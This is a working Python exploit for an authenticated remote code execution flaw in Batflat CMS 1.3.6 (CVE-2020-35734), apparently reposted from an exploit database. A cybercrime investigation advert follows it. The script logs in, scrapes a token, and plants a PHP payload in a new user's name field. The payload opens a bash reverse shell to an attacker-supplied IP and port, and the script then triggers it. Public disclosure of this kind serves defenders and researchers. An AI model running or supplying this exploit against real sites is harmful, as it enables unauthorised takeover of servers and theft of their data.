# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
# Date: 2020-12-27
# Exploit Author: mari0x00
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/
# Version: <= 1.3.6
# CVE: CVE-2020-35734

#!/usr/bin/python3

import requests
import sys
import re
from bs4 import BeautifulSoup
from termcolor import colored
from time import sleep

print(colored('''###########################################################''',"red"))
print(colored('''#######    Batflat authenticated RCE by mari0x00    #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")

if len(sys.argv) != 6:
    print((colored("[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>","red")))
    print((colored("[~] Default credentials: admin/admin","red")))
    print((colored("[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444","red")))
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]


#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}


#Authenticate
print((colored("[+] Attempting user login","blue")))

login_data = {
    "username": username,
    "password": password,
    "login": "",
   }

login = s.post(url+"admin/", login_data, headers=headers)
sleep(0.5)

#Get token
print((colored("[+] Retrieving the token","blue")))
r = s.get(url+"admin/", headers=headers).content
soup = BeautifulSoup(r, "lxml")
token = (re.search(r't=(.*?)">Add', str(soup)).group(1))
print((colored("[+] Token ID: " + token,"blue")))
sleep(0.5)

#Get URL
print((colored("[+] Getting the add-user endpoint URL","blue")))
r = s.get(url+"admin/users/add?t="+token, headers=headers).content
soup = BeautifulSoup(r, "lxml")
add_user_url = (re.search(r'action="(.*?)"', str(soup)).group(1))
sleep(0.5)

#Exploit
print((colored("[+] Adding pwnd user","blue")))
payload = "<?php system("/bin/bash -c 'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1'");?>"

add_user = {
    "username": (None, "pwnd"),
    "fullname": (None, payload),
    "description": (None, "pwnd"),
    "email": (None, "pwnd@evil.com"),
    "password": (None, "pwnd123"),
    "access[]": (None, "users"),
    "save": (None, "Save")
}

exploit = s.post(add_user_url, headers=headers, files=add_user)
sleep(0.5)

#Triggering reverse shell
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin/users/manage?t="+token, headers=headers)
            



Source link

Is your business effected by Cyber Crime?

If a cyber crime or cyber attack happens to you, you need to respond quickly. Cyber crime in its several formats such as online identity theft, financial fraud, stalking, bullying, hacking, e-mail fraud, email spoofing, invoice fraud, email scams, banking scam, CEO fraud. Cyber fraud can lead to major disruption and financial disasters. Contact Digitpol’s hotlines or respond to us online.

Digitpol’s Cyber Crime Investigation Unit provides investigative support to victims of cyber crimes. Digitpol is available 24/7. https://digitpol.com/cybercrime-investigation/

Europe +31558448040
UK +44 20 8089 9944
ASIA +85239733884